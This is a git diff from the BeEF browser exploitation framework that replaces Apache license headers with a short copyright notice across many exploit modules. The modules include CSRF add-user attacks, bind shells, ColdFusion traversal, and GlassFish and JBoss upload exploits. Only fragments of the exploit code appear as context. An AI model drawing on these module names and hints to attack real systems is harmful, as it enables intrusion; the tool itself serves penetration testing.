-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	var base     = '<%= @base %>'; 
 	var username = '<%= @username %>';
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
index c01ca6f49..94f2d4549 100644
--- a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/module.rb b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
index ba7f8e63e..587af0530 100644
--- a/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Axous_add_user_csrf < BeEF::Core::Command
 
diff --git a/modules/exploits/beefbind/beef_bind_shell/command.js b/modules/exploits/beefbind/beef_bind_shell/command.js
index 288e42f09..f4a0fc902 100755
--- a/modules/exploits/beefbind/beef_bind_shell/command.js
+++ b/modules/exploits/beefbind/beef_bind_shell/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function () {
     var rhost = '<%= @rhost %>';
     var rport = '<%= @rport %>';
diff --git a/modules/exploits/beefbind/beef_bind_shell/config.yaml b/modules/exploits/beefbind/beef_bind_shell/config.yaml
index 89bb770f0..2aa33ea98 100755
--- a/modules/exploits/beefbind/beef_bind_shell/config.yaml
+++ b/modules/exploits/beefbind/beef_bind_shell/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/beefbind/beef_bind_shell/module.rb b/modules/exploits/beefbind/beef_bind_shell/module.rb
index 86a7c0b96..c111a2016 100755
--- a/modules/exploits/beefbind/beef_bind_shell/module.rb
+++ b/modules/exploits/beefbind/beef_bind_shell/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Beef_bind_shell < BeEF::Core::Command
 
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
index e8a81727c..850858d5a 100755
--- a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function () {
     var rhost = '<%= @rhost %>';
     var rport = '<%= @rport %>';
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml
index 991d89bf0..d824aefc0 100755
--- a/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
index 69dd2d9b9..62a042541 100755
--- a/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Beef_bind_staged_deploy < BeEF::Core::Command
 
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/command.js b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
index 7e312ae66..a456ebdc6 100644
--- a/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	var base     = '<%= @base %>'; 
 	var username = '<%= @username %>';
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
index f16e2ece6..e081ee76e 100644
--- a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
index 0fcdc068b..d3960b92b 100644
--- a/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Boastmachine_add_user_csrf < BeEF::Core::Command
 
diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/command.js b/modules/exploits/camera/dlink_dcs_series_csrf/command.js
index 725d60c24..71fd886fd 100644
--- a/modules/exploits/camera/dlink_dcs_series_csrf/command.js
+++ b/modules/exploits/camera/dlink_dcs_series_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var base = '<%= @base %>'; 
   var passwd = '<%= @password %>';
diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
index af3d4a3f0..515f1faac 100644
--- a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
+++ b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # More info: http://www.exploit-db.com/exploits/18509/
 #
diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/module.rb b/modules/exploits/camera/dlink_dcs_series_csrf/module.rb
index 49ed6809f..a96724404 100644
--- a/modules/exploits/camera/dlink_dcs_series_csrf/module.rb
+++ b/modules/exploits/camera/dlink_dcs_series_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Dlink_dcs_series_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js
index 2271f1d33..6ab1c5d73 100644
--- a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js
+++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var path    = 'adm/file.cgi';
diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml
index 2bc3a6bfc..7ff69cab3 100644
--- a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml
+++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb
index ffa988308..6dc483e7b 100644
--- a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb
+++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Linksys_wvc_wireless_camera_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/command.js b/modules/exploits/coldfusion_dir_traversal_exploit/command.js
index ec06b38d9..98992ae43 100644
--- a/modules/exploits/coldfusion_dir_traversal_exploit/command.js
+++ b/modules/exploits/coldfusion_dir_traversal_exploit/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /**
  * ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor .
  * Inject into the vulnerable "locale" parameter the classic payload of a directory traversal.
diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml b/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml
index e65daa2c1..09cae23bc 100644
--- a/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml
+++ b/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/module.rb b/modules/exploits/coldfusion_dir_traversal_exploit/module.rb
index 21d58a474..7dee12c51 100644
--- a/modules/exploits/coldfusion_dir_traversal_exploit/module.rb
+++ b/modules/exploits/coldfusion_dir_traversal_exploit/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Coldfusion_dir_traversal_exploit < BeEF::Core::Command
 
diff --git a/modules/exploits/glassfish_war_upload_xsrf/command.js b/modules/exploits/glassfish_war_upload_xsrf/command.js
index 9d681a207..1e0e2a8e3 100644
--- a/modules/exploits/glassfish_war_upload_xsrf/command.js
+++ b/modules/exploits/glassfish_war_upload_xsrf/command.js
@@ -1,19 +1,10 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
+
 //   This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com
 //   For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html
 
diff --git a/modules/exploits/glassfish_war_upload_xsrf/config.yaml b/modules/exploits/glassfish_war_upload_xsrf/config.yaml
index 77572060e..53633a7ab 100644
--- a/modules/exploits/glassfish_war_upload_xsrf/config.yaml
+++ b/modules/exploits/glassfish_war_upload_xsrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/glassfish_war_upload_xsrf/module.rb b/modules/exploits/glassfish_war_upload_xsrf/module.rb
index a18ca8cd4..4b9586b13 100644
--- a/modules/exploits/glassfish_war_upload_xsrf/module.rb
+++ b/modules/exploits/glassfish_war_upload_xsrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Glassfish_war_upload_xsrf < BeEF::Core::Command
 
diff --git a/modules/exploits/jboss_jmx_upload_exploit/command.js b/modules/exploits/jboss_jmx_upload_exploit/command.js
index a700594a1..2fb1c10d2 100644
--- a/modules/exploits/jboss_jmx_upload_exploit/command.js
+++ b/modules/exploits/jboss_jmx_upload_exploit/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /**
  * Jboss 6.0.0M1 JMX Upload Exploit
  * Ported from l33tb0y Ruby code in Javascript by antisnatchor.
diff --git a/modules/exploits/jboss_jmx_upload_exploit/config.yaml b/modules/exploits/jboss_jmx_upload_exploit/config.yaml
index d98d4a52a..457c4efba 100644
--- a/modules/exploits/jboss_jmx_upload_exploit/config.yaml
+++ b/modules/exploits/jboss_jmx_upload_exploit/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/jboss_jmx_upload_exploit/module.rb b/modules/exploits/jboss_jmx_upload_exploit/module.rb
index a5345cdb6..e18541ab3 100644
--- a/modules/exploits/jboss_jmx_upload_exploit/module.rb
+++ b/modules/exploits/jboss_jmx_upload_exploit/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Jboss_jmx_upload_exploit < BeEF::Core::Command
 
diff --git a/modules/exploits/local_host/activex_command_execution/command.js b/modules/exploits/local_host/activex_command_execution/command.js
index c6eeac3d6..4d3e7cd71 100755
--- a/modules/exploits/local_host/activex_command_execution/command.js
+++ b/modules/exploits/local_host/activex_command_execution/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var cmd = '<%= @cmd.gsub(/'/, "\\'") %>';
diff --git a/modules/exploits/local_host/activex_command_execution/config.yaml b/modules/exploits/local_host/activex_command_execution/config.yaml
index 0a4d45a45..96022b207 100755
--- a/modules/exploits/local_host/activex_command_execution/config.yaml
+++ b/modules/exploits/local_host/activex_command_execution/config.yaml
@@ -1,17 +1,7 @@
 #
